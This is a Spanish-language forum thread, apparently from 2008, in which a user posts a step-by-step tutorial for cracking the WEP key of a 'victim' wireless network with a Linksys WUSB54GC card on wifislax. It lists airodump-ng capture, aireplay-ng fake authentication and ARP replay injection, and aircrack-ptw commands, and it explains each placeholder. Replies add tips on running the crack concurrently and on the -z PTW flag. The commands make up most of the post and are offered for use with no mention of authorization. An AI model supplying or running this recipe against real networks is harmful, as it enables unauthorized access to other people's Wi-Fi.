?>/script>'; } ?> [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73 Widgets Magazine

Autor Tema: [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73  (Leído 23963 veces)

0 Usuarios y 1 Visitante están viendo este tema.

MgsanchezS

  • Visitante
Hola a todos es mi primer aporte espero que les guste ya que yo lo hice a base de leer mucho  ;D.

ACLARO: Este manual o tutorial es esclusivo de la tarjeta USB Linksys WUSB54GC
la cual yo uso y no se si funcione para otras tarjetas ya que no lo he probado.

 Empezamos.

Ya estando en el escritorio de wifislax abrimos una shell nueva
y realizamos lo siguiente (pondre todos los pasos juntos)

1.- ifconfig rausb0 up
2.- iwpriv rausb0 rfmontx 1
3.- iwconfig rausb0 rate 1m
4.- airmon start rausb0 ch
5.- airodump-ng -w XXXX -c ch
6.- aireplay-ng -1 -30 -e NOMRED -a 00:00:00:00:00:00 -h TUMAC rausb0
7.- aireplay-ng -3 -x600 -b 00:00:00:00:00:00 -h TUMAC rausb0
Despues de los 60000 caps
8.- aircrack-ptw XXXX-01.cap

y si son suficientes caps te dara la llave wep si no es espera a los 100000 caps.
OJO; cada que ya no puedas trabajar en una shell por ser usada por una aplicacion (aircrack, airmon, aireplay, airodump etc....) abre una nueva shell y sigue con el siguiente paso.

Definiciones:

CH.- Canal inalambrico que usa la victima
XXXX.- Nombre a guardar los paquetes (IE. carlos, wepp. cams, root, toor etc...)
NOMRED .- Bssid o nombre de la red victima (IE, 2WIREXXX, INFINITUMXXXX (Aqui hay que escribir tal cual como este la red, si esta en mayusculas todo, pues todo en mayusculas, si se llamo la red''ShOOLlaMO'' tal cual la tienen que escribir).
00:00:00:00:00:00.- Direccion MAC de la victima
TUMAC.- la Mac que viene en la parte trasera de tu tarjeta USB WUSB54GC

MgsanchezS
« Última modificación: 14-09-2008, 01:23 (Domingo) por MgsanchezS »

cronos-carthago

  • Visitante
Re: [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73
« Respuesta #1 en: 14-09-2008, 02:48 (Domingo) »

Despues de los 60000 caps
8.- aircrack-ptw XXXX-01.cap


buen aporte, eso si, un detalle de la casa.... aircrack no es que vaya a quemarte la maquina, no consume demasiado y no va a corromper los paquetes... se puede ejecutar con el resto de comandos, irte a tomarte algo y cuando vuelvas ya lo tendras (tambien puedes ver una peli ... ya a tu imaginacion)

es decir, dejas todo ejecutandose y ya se sacara la clave de por si  ;)

MgsanchezS

  • Visitante
Re: [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73
« Respuesta #2 en: 14-09-2008, 14:54 (Domingo) »

Despues de los 60000 caps
8.- aircrack-ptw XXXX-01.cap




buen aporte, eso si, un detalle de la casa.... aircrack no es que vaya a quemarte la maquina, no consume demasiado y no va a corromper los paquetes... se puede ejecutar con el resto de comandos, irte a tomarte algo y cuando vuelvas ya lo tendras (tambien puedes ver una peli ... ya a tu imaginacion)

es decir, dejas todo ejecutandose y ya se sacara la clave de por si  ;)

En eso no concuerdo porque una vez que lanzas arcrack-ptw y te dice que tienes muy pocos caps se congela ahi y hace una pregunta de que si quieres volver a buscar la wepkey, entoces si no estas ahi, no podras decirle que si quires seguir buscando asi que por eso yo lo dejo al final.

berni69

  • Visitante
Re: [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73
« Respuesta #3 en: 14-09-2008, 15:23 (Domingo) »
si lanzas el aircrack-ng con el ataque ptw es decir con el modificador -z va haciendolo automaticamente  ;)

cronos-carthago

  • Visitante
Re: [TUTORIAL] WUSB54GC rausb0 + wifislax 3.1 facil y rapido ralink rt73
« Respuesta #4 en: 14-09-2008, 16:07 (Domingo) »
si lanzas el aircrack-ng con el ataque ptw es decir con el modificador -z va haciendolo automaticamente  ;)

a eso me referia